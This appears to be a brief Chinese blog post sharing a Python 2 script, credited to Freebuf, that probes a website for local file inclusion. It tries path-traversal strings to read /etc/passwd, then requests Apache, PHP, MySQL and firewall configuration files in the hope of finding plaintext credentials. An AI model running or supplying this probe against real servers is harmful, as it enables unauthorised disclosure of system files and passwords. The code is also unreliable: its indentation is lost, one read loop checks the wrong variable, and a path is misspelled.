用Python写的检测本地文件包含的小工具,可以根据自己的需求/经验自己添加文件路径:
#!/usr/bin/env python
#-*-coding:utf-8-*-
import urllib2
import sys
var1=0
var2=0
print ("-----------------------------------------------------")
print ("| usage:py_detect_LFI.py site url |")
print ("|this url like http://www.google.com/index.php?id= |")
print (" writed by eip_0x[Freebuf],just 4 fun |")
print ("-----------------------------------------------------")
site0=sys.argv[1]+'/kfdsjkf7675637d.txt' #访问一个不存在的文件获取返回错误页面的length信息
req0=urllib2.Request(site0)
conn0=urllib2.urlopen(req0)
while 1:
data0=conn0.read(4072) #错误页面的内容
if not len(data0):
break
paths1=['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd']
paths2=['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf']
for path in paths1: #首先查找'/etc/passwd'文件是否存在
site=sys.argv[1]+path
req=urllib2.Request(site)
conn=urllib2.urlopen(req)
while 1:
data=conn.read(4072)
if not len(data0):
break
if len(data)!=len(data0):
print path," this file has been found!!!!u r lucky and have fun!!!!"
for path2 in paths2: #在查找到了'/etc/passwd'文件之后再查找配置文件,希望能从中读取出用户名密码的明文信息
path2ok=path.replace("/etc/passwd",path2) #replace("查找的内容","替换后的内容"[,次数]),替换次数可以为空,即表示替换所有
site2=sys.argv[1]+path2ok
req2=urllib2.Request(site2)
conn2=urllib2.urlopen(req2)
while 1:
data2=conn2.read(4072)
if not len(data2):
break
if len(data2)!=len(data0):
print path2,"this file has been found!!"
如代码中所示,脚本是从Freebuf上搜集过来的,上面还有好多好东西,值得你去学习。